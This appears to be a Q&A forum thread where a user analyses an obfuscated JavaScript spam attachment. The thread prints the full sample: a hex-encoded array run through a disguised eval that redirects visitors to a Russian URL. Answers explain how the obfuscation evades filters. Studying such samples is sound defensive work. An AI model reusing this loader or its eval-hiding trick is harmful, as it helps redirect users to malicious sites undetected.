# Javascript - obfuscation - Learning from the baddies

Tags: javascript

This morning I received some SPAM. I noticed that the attached file was a .html file. Instead of trashing it I took it as a learning opportunity and copied it over to my desktop and renamed it to .txt and loaded it up in notepad.

Here is the html + obfuscated script as it appears in the SPAM attachment:

```
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
</head>
<body>  
<h1><b>Please wait. You will be forwarded.. . </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>

<script>asgq=    [0x76,0x61,0x72,0x31,0x3d,0x34,0x39,0x3b,0xa,0x76,0x61,0x72,0x32,0x3d,0x76,0x61,0x72,0x31,0x3b,0xa,0x69,0x66,0x28,0x76,0x61,0x72,0x31,0x3d,0x3d,0x76,0x61,0x72,0x32,0x29,0x20,0x7b,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x6c,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x3d,0x22,0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,0x67,0x69,0x6c,0x69,0x61,0x6f,0x6e,0x73,0x6f,0x2e,0x72,0x75,0x3a,0x38,0x30,0x38,0x30,0x2f,0x66,0x6f,0x72,0x75,0x6d,0x2f,0x6c,0x69,0x6e,0x6b,0x73,0x2f,0x63,0x6f,0x6c,0x75,0x6d,0x6e,0x2e,0x70,0x68,0x70,0x22,0x3b,0x7d];try{document.body&=0.1}catch(gdsgsdg){zz=3;dbshre=56;if(dbshre){vfvwe=0;    try{}catch(agdsg){vfvwe=1;}if(!vfvwe){e=window["e".concat("val")];}
 s="";for(i=0;i-105!=0;i++){if(window.document)s+=String.fromCharCode(asgq[i]);}
 z=s;e(s);}}</script>
</body>
</html>
```

The first thing I did was line it up to be slightly more readable:

```
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
</head>
<body>  
<h1><b>Please wait. You will be forwarded.. . </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>

<script>
asgq=[0x76,0x61,0x72,0x31,0x3d,0x34,0x39,0x3b,0xa,0x76,0x61,0x72,0x32,0x3d,0x76,0x61,0x72,0x31,0x3b,0xa,0x69,0x66,0x28,0x76,0x61,0x72,0x31,0x3d,0x3d,0x76,0x61,0x72,0x32,0x29,0x20,0x7b,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x6c,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x3d,0x22,0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,0x67,0x69,0x6c,0x69,0x61,0x6f,0x6e,0x73,0x6f,0x2e,0x72,0x75,0x3a,0x38,0x30,0x38,0x30,0x2f,0x66,0x6f,0x72,0x75,0x6d,0x2f,0x6c,0x69,0x6e,0x6b,0x73,0x2f,0x63,0x6f,0x6c,0x75,0x6d,0x6e,0x2e,0x70,0x68,0x70,0x22,0x3b,0x7d];
try{document.body&=0.1} 
catch(gdsgsdg) 
{
 zz=3;
 dbshre=56;
   if(dbshre){
     vfvwe=0;
     try{}
     catch(agdsg)
     {vfvwe=1;}
     if(!vfvwe){
     e=window["e".concat("val")];
     s="";

   for(i=0;i-105!=0;i++){
     if(window.document)
        s+=String.fromCharCode(asgq[i]);
   }
z=s;
e(s);
    }  
   }
</script>
</body>
</html>
```

At this point it is obvious the script author is hiding the goodies inside the asgq array as charater codes. 0x76 = "v", 0x61 = "a", 0x72 = "r", etc... hmm the first 3 elements already spells out "var"!

asgq.length = 105. In the for loop the end condition that the author used is "i-105!=0" which is a confusing way to say i < asgq.length. "zz=3;" appears to do nothing/not be involved with the rest of the script.  There is also an unmatched "{" after the first catch statement.

I ran the for loop and unpacked the array into an alert box. Here is what I got:

"
      var1=49;
      var2=var1;
      if(var1==var2) {document.location="http://giliaonso.ru:8080/forum/links/column.php";}
"

So the author is going through the trouble of making 49=49 with char codes and if 49=49, then window.location = russian site.

My questions:

1. The author is using try cache statements. The first try condition is (document.body&=0.1). Is this designed to fail and move on to the cache part of the statement or is this some bitwise operation? If it is bitwise, why the "=0.1"?
2. The first cache is passing "agdsg". I have only ever seen cache(e) with "e" passed. What does passing any value besides e do?
3. What exactly is the line, "e=window["e".concat("val")];" doing? I seems like it is acting as a function declaration that the author later invokes: "e(s);" "s" being the unpacked array.

Any assistance is appreciated.

Comment: 2. It doesn't matter what name you give it, it always does the same thing because it's just a variable name.

Comment: 3. What happens if you take `"e"` and concat `"val"`?

Comment: @IgorJerosimić: Although there is a very pertinent reason.  The author is intending to hide the purpose of the code, so renaming variable names is a very easy way to get past hash checks in virus software.

Comment: `catch` takes a variable, you name it whatever you want (like `agdsg`).

Comment: @ the system, that is evil!!  So the author is using: eval(s).

Comment: @Justin: Yes, global variables appear as properties on the `window` object, and you can look them up dynamically using a string. So they're effectively doing `e = window.eval`, so now `e` is a reference to the `eval` function, and `s` is being evaluated as code.

Answer (score 3):

1) This tries to assign `0` to `document.body` which will throw an error:

```
document.body&=0.1
//is the same as
document.body = document.body & 0.1;
//document.body & *anything* returns 0
```

2) `catch` takes a vaiable name as the argument, you can name it whatever you want (including `agdsg`.

3) Lets break this down a bit:

```
e=window["e".concat("val")];
//"e".concat("val") returns "eval"
e=window["eval"]
//which gives you the global "eval()" function
```

Basically the author decodes that array into a string of code to be executed, then uses `eval()` to run it. The reason they don't just use `eval("var ...")` is because obfuscating eval off (as well as the string) makes it more difficult for a filter (or human) to see it is running eval. If it knew it was running eval it may check the string and stop the redirect code.